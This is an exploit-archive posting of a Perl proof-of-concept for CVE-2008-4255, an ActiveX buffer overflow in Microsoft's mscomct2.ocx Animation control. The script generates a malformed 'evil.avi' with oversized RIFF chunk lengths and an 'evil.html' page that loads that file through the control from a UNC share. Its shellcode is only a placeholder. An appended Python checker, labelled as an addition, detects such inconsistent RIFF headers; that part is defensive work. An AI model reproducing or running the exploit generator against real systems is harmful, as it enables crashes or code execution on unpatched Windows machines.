
Microsoft Visual Basic ActiveX Buffer Overflow

Posted Dec 12, 2008
Authored by Jerome Athias

Microsoft Visual Basic Active-X Controls buffer overflow proof of concept exploit that leverages mscomct2.ocx.

tags | exploit, overflow, activex, proof of concept
SHA-256 | 9e908a95caf95ef805674d900baaa9e609f55f84e306674f7900dde2246a3c2a

#!/usr/bin/perl
# Microsoft Visual Basic ActiveX Controls mscomct2.ocx Animation Object Buffer Overflow (CVE-2008-4255) PoC
# You'll need Debugging Tools for Windows http://www.microsoft.com/whdc/devtools/debugging/default.mspx
# /JA
# Come to FRHACK!
# www.frhack.org

print "\nMicrosoft Visual Basic ActiveX Controls mscomct2.ocx Animation Object Buffer Overflow (CVE-2008-4255) PoC\n";
print "Generating malicious .AVI file\n";
print "This file should be served via an UNC path\n";
print "[->] Building evil.avi\n";

my $shellcode = "http://metasploit.com";

$FileHeader =
"\x52\x49\x46\x46\x2C\x08\x00\x00\x41\x56\x49\x20\x73\x74\x72\x68\x10\x00\x00\x00\x76\x69\x64\x73\x20\x20\x20\x20\x00\x00\x00\x00".
"\x00\x00\x00\x00\x73\x74\x72\x66\x00\x08\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

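open(my $poc, '>', 'evil.avi') or die "Cannot write evil.avi: $!";
binmode($poc);  # write raw bytes, no newline translation on Windows
print $poc $FileHeader;
close($poc);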

print "[->] evil.avi generated\n";
print "[->] Building evil.html\n";

$EvilHTML =
"<html><head></head><body><object id='evil' classid='clsid:B09DE715-87C1-11D1-8BE3-0000F8754DA1'><param name='AutoPlay' value='True'></object>".
"<script language=javascript>evil.Open('\\\\192.168.0.1\\share\\evil.avi');</script></body></html>";

open(my $html, '>', 'evil.html') or die "Cannot write evil.html: $!";
print $html $EvilHTML;
close($html);

print "[->] evil.html generated\n";
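
The header the script writes declares RIFF and strf lengths (0x82C and 0x800) far larger than the few dozen bytes that follow, which a structural check can flag before a file reaches a media parser. The checker below is an added example, not part of the original PoC; `riff_findings`, `chunk` and both sample blobs are hypothetical names and constructed data, with the suspect sample modelled on that header.

```python
import struct

def riff_findings(data: bytes) -> list:
    """Return structural inconsistencies in a RIFF file; an empty list means consistent."""
    if len(data) < 12 or data[:4] != b"RIFF":
        return ["not a RIFF container"]
    findings = []
    (riff_size,) = struct.unpack_from("<I", data, 4)
    if riff_size + 8 > len(data):
        findings.append(f"RIFF declares {riff_size + 8} bytes, file has {len(data)}")
    pos = 12  # past 'RIFF', the size field and the form type ('AVI ')
    while pos + 8 <= len(data):
        tag = data[pos:pos + 4]
        (size,) = struct.unpack_from("<I", data, pos + 4)
        body = pos + 8
        remaining = len(data) - body
        if size > remaining:
            name = tag.decode("latin-1")
            findings.append(f"{name} at offset {pos} declares {size} bytes, {remaining} remain")
            break  # offsets after an over-long chunk cannot be trusted
        if tag == b"LIST" and size >= 4:
            pos = body + 4  # descend into the list, skipping its 4-byte type
        else:
            pos = body + size + (size & 1)  # chunk bodies are padded to even length
    return findings

def chunk(tag: bytes, body: bytes) -> bytes:
    """Build a chunk whose length field matches its body (helper for the samples)."""
    return tag + struct.pack("<I", len(body)) + body

# Constructed samples (not captured files).
STRH = b"vids" + b"    " + bytes(8)
_body = b"AVI " + chunk(b"strh", STRH) + chunk(b"strf", struct.pack("<I", 40) + bytes(36))
WELL_FORMED = b"RIFF" + struct.pack("<I", len(_body)) + _body
# Same layout, but the length fields claim far more data than is present.
SUSPECT = (b"RIFF" + struct.pack("<I", 0x82C) + b"AVI " + chunk(b"strh", STRH)
           + b"strf" + struct.pack("<I", 0x800) + struct.pack("<I", 40) + bytes(16))

if __name__ == "__main__":
    for label, blob in (("well-formed", WELL_FORMED), ("suspect", SUSPECT)):
        print(label, riff_findings(blob) or "consistent")
```
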

